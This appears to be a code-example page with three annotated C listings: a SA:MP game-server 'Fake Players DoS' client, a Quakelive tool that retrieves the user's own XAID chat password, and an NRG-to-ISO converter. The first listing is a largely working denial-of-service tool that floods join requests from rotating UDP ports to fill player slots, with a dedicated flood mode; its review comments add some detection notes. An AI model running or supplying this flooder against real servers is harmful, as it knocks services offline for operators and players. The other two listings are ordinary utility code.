Пример #1
/*
 * Entry point of a proof-of-concept client that sends one info query to a
 * SA:MP game server over UDP and then loops forever sending join requests,
 * each from a new socket bound to the next local port.  The banner calls the
 * effect "invisible Fake Players DoS"; the "server full" reply handled below
 * suggests the requests occupy player slots.
 *
 * Notes for whoever has to recognise or limit this traffic:
 *   - every attempt comes from the same source address but a different UDP
 *     source port, because a fresh socket is bound per iteration;
 *   - in flood mode (-f) the client stops reading replies after the first
 *     accepted join and only pauses FLOODMS between sends;
 *   - NOTE(review): a per-source-address cap on join attempts on the server
 *     or in front of it would presumably bound the effect -- confirm against
 *     the server's own connection handling.
 *
 * Helpers used here (resolv, putmm, putxx, send_recv, sampinfo, samp03_crypt,
 * fgetz, waitms, std_err) and the constants PORT, BUFFSZ, FLOODMS, ONESEC and
 * VER are defined outside this listing.
 *
 * Returns 0 in theory; the main loop has no exit other than exit().
 */
int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,   /* remote server address */
                        peerl;  /* local address the sockets are bound to */
    struct  linger  ling = {1,1};   /* l_onoff = 1, l_linger = 1 */
    int     sd,
            i,
            len,
            ver     = 1,    /* protocol variant selector, overwritten with 6 below */
            z       = 0,    /* per-version flag passed as last argument of send_recv */
            flood   = 0,    /* 0 = off, 1 = requested with -f, 2 = active */
            full    = 0,    /* first reply byte that this version uses for "server full" */
            joined  = 0;    /* first reply byte that this version uses for "join accepted" */
    u16     port    = PORT;
    u8      *buff,
            pass[128],      /* server password typed by the user, empty by default */
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    /* unbuffered stdout so progress text appears immediately */
    setbuf(stdout, NULL);

    fputs("\n"
        "SA:MP invisible Fake Players DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web:    aluigi.org\n"
        "edit:   by Hordejoy\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [options] <host[:port]>\n"
            "\n"
            "-p PORT  server port that you can specify also after host, default is %hu\n"
            "-f       flooding option, perfect for slow connections or for testing servers\n"
            "         with many slots\n"
            "\n", argv[0], port);
        exit(1);
    }

    /* the last argument is the host, so the option loop stops one short of it */
    argc--;
    for(i = 1; i < argc; i++) 
	{
        /* an option is exactly two characters: '-' or '/' plus a letter */
        if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) 
		{
            printf("\nError: wrong argument (%s)\n", argv[i]);
            exit(1);
        }
        switch(argv[i][1]) 
		{
            case 'p': 
			{
                if(!argv[++i]) exit(1);
                /* NOTE(review): atoi() reports no errors and the int result is
                   narrowed to u16 without a range check */
                port        = atoi(argv[i]);
                } break;
            case 'f': 
			{
                flood       = 1;
                } break;
            default: 
			{
                printf("\nError: wrong argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }

    /* split an optional ":port" suffix off the host in place */
    host = argv[argc];
    p = strchr(host, ':');
    if(p) 
	{
        *p = 0;
        port = atoi(p + 1);
    }

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    /* local port is seeded from the current time; the loop below increments it */
    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(time(NULL));
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));

    buff  = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    /* info query: "SAMP", server address, server port, then the letter 'i'.
       putmm/putxx presumably append the data and return the bytes written --
       TODO confirm against their definitions */
    p = buff;
    p += putmm(p, "SAMP",               4);
    p += putxx(p, peer.sin_addr.s_addr, 32);
    p += putxx(p, ntohs(peer.sin_port), 16);
    p += putxx(p, 'i',                  8);

    /* the reply overwrites the request buffer.
       NOTE(review): len is handed to sampinfo() without being checked here */
    len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1, 0);
    close(sd);
    sampinfo(buff, len);

    pass[0] = 0;

    /* VERSION */
    ver = 6;    // remember to change this one with new versions!
    /* VERSION */

    printf("- start attack:");
    for(;;) 
	{
        printf("\n  Player: ");

        /* one new socket per attempt, bound to the next local port; the port
           field is incremented as stored (network byte order) until bind works */
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
        do 
		{
            peerl.sin_port++;
        } 
		while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0);

        /* per version: the z flag, the "full" and "joined" reply codes and the
           first byte of the request */
        p = buff;
        switch(ver) 
		{
            case 1: { z = 0;    full = 0x14;    joined = 0x12;  p += putxx(p, 0x03, 8);     break; }
            case 2: { z = 0;    full = 0x13;    joined = 0x0b;  p += putxx(p, 0x0a, 8);     break; }
            case 3: { z = 1;    full = 0x1d;    joined = 0x10;  p += putxx(p, 0x0f, 8);     break; }
            case 4: { z = 1;    full = 0x1b;    joined = 0x11;  p += putxx(p, 0x10, 8);     break; }
            case 5: { z = 0;    full = 0x21;    joined = 0x18;  p += putxx(p, 0x17, 8);     break; }
            case 6: { z = 0;    full = 0x1b;    joined = 0x12;  p += putxx(p, 0x11, 8);     break; }
            /* reached once ver has been decremented below 1, i.e. no variant got a reply */
            default: 
			{
                printf("\nError: socket timeout, no reply received\n");
                exit(1);
                break;
            }
        }
        /* append the password; the -1 length presumably means "NUL-terminated" -- TODO confirm */
        p += putmm(p, pass,     -1);
        len = p - buff;

        /* variants 5 and 6+ pass the request through samp03_crypt with a different last argument */
        if(ver == 5) len = samp03_crypt(buff, len, port, 1, 0);
        if(ver >= 6) len = samp03_crypt(buff, len, port, 1, 1);

        /* in active flood mode the receive buffer is NULL, so no reply is stored */
        len = send_recv(sd, buff, len, (flood == 2) ? NULL : buff, BUFFSZ, &peer, 0, z);
        close(sd);

        if(len < 0) {
            printf("\n- no reply I try with an older version\n");
            ver--;
            continue;
        }

        /* active flood mode: pause FLOODMS and send again without inspecting anything */
        if(flood == 2) {
            waitms(FLOODMS);
            continue;
        }

        // seems not used
        //if(ver == 5) len = samp03_crypt(buff, len, port, 0, 0);
        //if(ver >= 6) len = samp03_crypt(buff, len, port, 0, 1);

        /* the first reply byte decides what happened */
        if(buff[0] == full) {
            printf("server full");
            sleep(ONESEC);
            continue;
        }

        if(buff[0] != joined) 
		{
            /* 0x13 / 0x19: the server asks for a password, read one and retry */
            if((buff[0] == 0x13) || (buff[0] == 0x19)) 
			{
            //             \wrong               \not set
            // version 2 doesn't want a password eh eh eh cool!
                printf("\n- server is protected, insert the password:\n  ");
                fgetz(pass, sizeof(pass));
                continue;
            }
            printf("\n- unknown packet reply (%d)\n", buff[0]);
            //exit(1);
        } else 
		{
            /* first accepted join with -f given: switch to active flood mode */
            if(flood) 
			{
                printf("\n- start flooding\n");
                flood = 2;
            }
        }
    }

    /* not reached: the loop above only leaves through exit(); buff is never freed */
    return(0);
}
Пример #2
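/*
 * Percent-encode src into dst so it can be placed in an
 * application/x-www-form-urlencoded body.  Only unreserved characters
 * (letters, digits, '-', '_', '.', '~') are copied as they are.
 * Returns the encoded length, or -1 when dst (dstsz bytes including the
 * terminating NUL) is too small or an argument is missing.
 */
static int form_encode(char *dst, size_t dstsz, const char *src) {
    static const char   hex[] = "0123456789ABCDEF";
    size_t  o = 0;

    if(!dst || !src || !dstsz) return(-1);
    for(; *src; src++) {
        unsigned char   c = (unsigned char)*src;

        if(((c >= 'a') && (c <= 'z')) || ((c >= 'A') && (c <= 'Z')) ||
           ((c >= '0') && (c <= '9')) ||
           (c == '-') || (c == '_') || (c == '.') || (c == '~')) {
            if((o + 1) >= dstsz) return(-1);
            dst[o++] = (char)c;
        } else {
            if((o + 3) >= dstsz) return(-1);
            dst[o++] = '%';
            dst[o++] = hex[c >> 4];
            dst[o++] = hex[c & 15];
        }
    }
    dst[o] = 0;
    return((int)o);
}

/*
 * Log in to quakelive.com with the account's mail address and password,
 * fetch the session data and print the XAID value, which the banner
 * describes as the xmpp.quakelive.com password.
 *
 * argv[1] (mail) and argv[2] (password) are optional; missing values are
 * asked for interactively.  A password given on the command line is visible
 * to other local users in the process list, so the prompt is the safer way.
 *
 * mydown(), mydown_options, fgetz(), show_qldata(), QLURL1, QLURL2 and VER
 * are defined outside this listing.
 *
 * Always returns 0; errors are reported on stdout.
 */
int main(int argc, char *argv[]) {
    mydown_options  opt;
    int     len,
            n;
    u8      content[1024],
            *buff       = NULL,
            *mail       = NULL,
            *pass       = NULL,
            *mail_dup   = NULL, // heap copies made when the values are typed in
            *pass_dup   = NULL,
            *xaid;
    char    mail_enc[400],
            pass_enc[400];

    fputs("\n"
        "Quakelive xmpp.quakelive.com password retriever "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [mail_address] [password]\n"
            "\n", argv[0]);
        //exit(1);
    }

    if(argc >= 2) mail = argv[1];
    if(argc >= 3) pass = argv[2];

    if(!mail) mail = mail_dup = strdup(fgetz("enter the mail address of the account"));
    if(!pass) pass = pass_dup = strdup(fgetz("enter the password of the account"));

    // strdup() can fail; the original went on to call strchr() on NULL
    if(!mail || !pass) {
        printf("\nError: unable to read the mail address or the password\n");
        goto quit;
    }

    if(!strchr(mail, '@')) {
        printf("\nError: you must insert your account mail address, not the username\n");
        goto quit;
    }

    memset(&opt, 0, sizeof(opt));
    opt.verbose     = 0; //-1;
    opt.filedata    = &buff;
    opt.referer     = "http://www.quakelive.com/";
    opt.more_http   = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
                      /*"X-Requested-With: XMLHttpRequest\r\n"*/;

    // The body is declared as form-urlencoded, so both values must be
    // percent-encoded: a raw '&', '=', '+' or '%' in the password would
    // otherwise change how the server splits the fields.
    if((form_encode(mail_enc, sizeof(mail_enc), (char *)mail) < 0) ||
       (form_encode(pass_enc, sizeof(pass_enc), (char *)pass) < 0)) {
        printf("\nError: the mail address or the password is too long\n");
        goto quit;
    }

    //snprintf(content, sizeof(content), "u=%s&p=%s&r=0", mail, pass);
    n = snprintf((char *)content, sizeof(content), "submit=&email=%s&pass=%s", mail_enc, pass_enc);
    if((n < 0) || ((size_t)n >= sizeof(content))) {
        // never send a silently truncated credential
        printf("\nError: the mail address or the password is too long\n");
        goto quit;
    }
    opt.get         = "POST";
    opt.content     = content;
    // NOTE(review): the referer above is plain http; confirm that QLURL1 is
    // an https URL, since this request carries the account password
    printf("- send mail and password to %s\n", QLURL1);
    len = mydown(QLURL1, NULL, &opt);
    if((len < 0) /*|| !buff*/) {
        printf("\nError: something wrong on the quakelive.com webserver\n");
        goto quit;
    }
    // buff may still be NULL here because the check above tolerates it
    if((len > 0) && buff) buff[len - 1] = 0;  // don't want to realloc for one byte

    /*
    if(!strstr(buff, "CODE\":0")) {
        if(len < 0) len = 0;
        printf("\n"
            "Error: seems that your account has not been accepted:\n"
            "       %.*s\n", len, buff);
        goto quit;
    }
    */
    free(buff);
    buff = NULL;    // otherwise the !buff test below would see a dangling pointer

    opt.get         = "GET";
    opt.content     = NULL;
    opt.more_http   = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
                      "X-Requested-With: XMLHttpRequest\r\n";
    printf("- get session informations from %s\n", QLURL2);
    len = mydown(QLURL2, NULL, &opt);
    // an empty reply cannot hold the XAID field and would not be NUL-terminated below
    if((len <= 0) || !buff) {
        printf("\nError: something wrong on the quakelive.com webserver\n");
        goto quit;
    }
    buff[len - 1] = 0;  // don't want to realloc for one byte

    xaid = strstr(buff, "\"XAID\":");
    if(!xaid) {
        printf("\n"
            "Error: no XAID field found, check the reply received from the server\n"
            "\n"
            "%s\n"
            "\n", buff);
    }

    xaid = show_qldata(buff, len);
    if(!xaid) {
        // passing NULL to %s is undefined behaviour, so stop here
        printf("\nError: no XAID value available\n");
        free(buff);
        buff = NULL;
        goto quit;
    }

    /*
    xaid = strchr(xaid, ':') + 1;
    if(xaid[0] == '\"') {
        xaid++;
        l = strchr(xaid, '\"');
    } else {
        l = strchr(xaid, ',');
    }
    if(l) *l = 0;
    */

    printf(
        "- your current xmpp.quakelive.com password (XAID) is\n"
        "\n"
        "  %s\n"
        "\n", xaid);
    free(buff);
    buff = NULL;

quit:
    free(mail_dup);
    free(pass_dup);
    fgetz("press RETURN to quit");
    return(0);
}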
Пример #3
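/*
 * Copy the source image to an ISO file (or to stdout), skipping the first
 * 307200 bytes of the source.  The first 17 sectors of 2048 bytes are read
 * first and handed to is_iso(); if the source already is an ISO 9660 image
 * nothing is written.
 *
 * Input is the file named by the global `filename`, or stdin when it is not
 * set.  Output goes to the global `destfile` when it is set and stdin is a
 * terminal, otherwise to stdout.  Status messages are mostly printed only
 * when `destfile` is set, so that they do not end up inside piped output.
 *
 * filename, destfile, __progname, is_iso(), same_file(), BAR_LENGTH and the
 * WIN32-only names (mywnd, p, argv, argc, get_file, put_file, fgetz) are
 * defined outside this listing.
 *
 * Returns 0 on success, 1 when there is nothing to do, and -1 on error;
 * because the return type is unsigned short the caller sees -1 as 65535.
 */
unsigned short exec()
{
    /* static: 1 MiB of automatic storage can exhaust the default thread
       stack on some platforms */
    static char buffer[1024 * 1024];
    size_t size = 0, l, i;
    size_t nrgSize = 0;
    struct stat buf;
    FILE   *nrgFile = NULL;

#ifdef WIN32
    mywnd = GetForegroundWindow();

    if (GetWindowLong(mywnd, GWL_WNDPROC)) {
        p = argv[1];
        argv = malloc(sizeof(char *) * 3);

        if (argc < 2)
            argv[1] = get_file();
        else
            argv[1] = p;

        argv[2] = put_file(argv[1]);
        argc = 3;
        p = strrchr(argv[2], '.');

        /* NOTE(review): malloc() is unchecked and strcat() assumes that
           put_file() returned a buffer with at least 4 spare bytes -- confirm */
        if (!p || (p && (strlen(p) != 4)))
            strcat(argv[2], ".iso");
    }
#endif

    if (filename) { // reading data from a file
        if (stat(filename, &buf) == 0) { // file exists
            nrgSize = buf.st_size;

            if (nrgSize < 1) {
                if (destfile) printf("%s: file '%s' is empty\n", __progname, filename);
                return -1;
            }

            if (!(nrgFile = fopen(filename, "rb"))) {
                // the original format string printed a literal "%s"
                if (destfile) printf("unable to open the source file %s\n", filename);
                return -1;
            }

            char buffy[17*2048];

            if (fread(buffy, 1, sizeof(buffy), nrgFile) != sizeof(buffy)) {
                if (destfile) printf("unable to read the source file %s\n", filename);
                fclose(nrgFile);
                return -1;
            }

            if (is_iso(buffy)) {
                if (destfile) printf("%s: %s is already an ISO 9660 image\n", __progname, filename);
                if (destfile) printf("Nothing to do... exiting.\n");
                fclose(nrgFile);
                return 1;
            }

            // a failed seek would copy the header into the output
            if (fseek(nrgFile, 307200, SEEK_SET) != 0) {
                if (destfile) printf("unable to read the source file %s\n", filename);
                fclose(nrgFile);
                return -1;
            }
        } else { // specified input file doesn't exist
            printf("%s: No such file '%s'\n", __progname, filename);
            return -1;
        }
    } else { // no files specified
        if (isatty(fileno(stdin))) { // stdin is a terminal
            printf("please specify an input file\n");
            return 1;
        } else { // stdin is a file or a pipe
            char buffy[17 * 2048];

            // a short read would leave part of buffy uninitialised for is_iso()
            if (fread(buffy, 1, sizeof(buffy), stdin) != sizeof(buffy)) {
                if (destfile) printf("unable to read the source data from stdin\n");
                return -1;
            }

            if (is_iso(buffy))
                return 1;

            // skip the rest of the first 307200 bytes of stdin, stopping at EOF
            long skip = 307200 - (long)sizeof(buffy);
            while (skip-- > 0) {
                if (fgetc(stdin) == EOF)
                    break;
            }
        }
    }

    if (destfile && isatty(fileno(stdin))) { // write to a file
        FILE *isoFile;
        short percent;
        short old_percent = -1;

        // NOTE(review): "wb+" truncates destfile before the same-file check
        // below runs, so when both names refer to one file the source has
        // already been emptied.  The check belongs before this fopen(); it is
        // left in place because open() is called here with a single argument
        // and its definition is not visible in this listing.
        isoFile = fopen(destfile, "wb+");

        if (!isoFile) {
            printf("\n%s: cannot write to file %s\n", __progname, destfile);
            fclose(nrgFile);
            return -1;
        }

        if (same_file(open(filename), open(destfile)) == 1) {
            printf("%s: the source and the destination files are the same\n", __progname);
            fclose(nrgFile);
            fclose(isoFile);
            return -1;
        }

        while ((i = fread(buffer, 1, sizeof(buffer), (filename) ? nrgFile : stdin)) > 0) {
            if (fwrite(buffer, i, 1, isoFile) != 1) {
                printf("\n%s: cannot write to file %s\n", __progname, destfile);
                fclose(nrgFile);
                fclose(isoFile);
                return -1;
            }

            size += i;
            percent = (int)(size * 100.0 / nrgSize);

            if (percent != old_percent) {
                old_percent = percent;

                printf("\r[");

                for (l = 0; l < percent * BAR_LENGTH / 100; l++)
                    printf("=");
                printf(">");

                l++;

                for (; l < BAR_LENGTH; l++)
                    printf(" ");

                printf("] %d%%", percent);

                fflush(stdout);
            }
        }

        printf("\r[");
        for (l = 0; l < BAR_LENGTH; l++)
            printf("=");
        printf("] 100%%");

        fflush(stdout);

        fclose(nrgFile);
        // fclose() flushes the last buffered data, so its result matters
        if (fclose(isoFile) != 0) {
            printf("\n%s: cannot write to file %s\n", __progname, destfile);
            return -1;
        }
        // size is a size_t; cast to match the %lu conversion
        printf("\n%s written: %lu bytes\n", destfile, (unsigned long)size);
    } else { // stdout
        while ((i = fread(buffer, 1, sizeof(buffer), (filename) ? nrgFile : stdin)) > 0) {
            if (fwrite(buffer, i, 1, stdout) != 1) {
                if (filename) fclose(nrgFile);
                return -1;
            }
        }

        if (filename) fclose(nrgFile);
    }

#ifdef WIN32
    u8 ans[8];

    if (GetWindowLong(mywnd, GWL_WNDPROC)) {
        printf("\nPress ENTER to quit");
        fgetz(ans, sizeof(ans), stdin);
    }
#endif

    return 0;
}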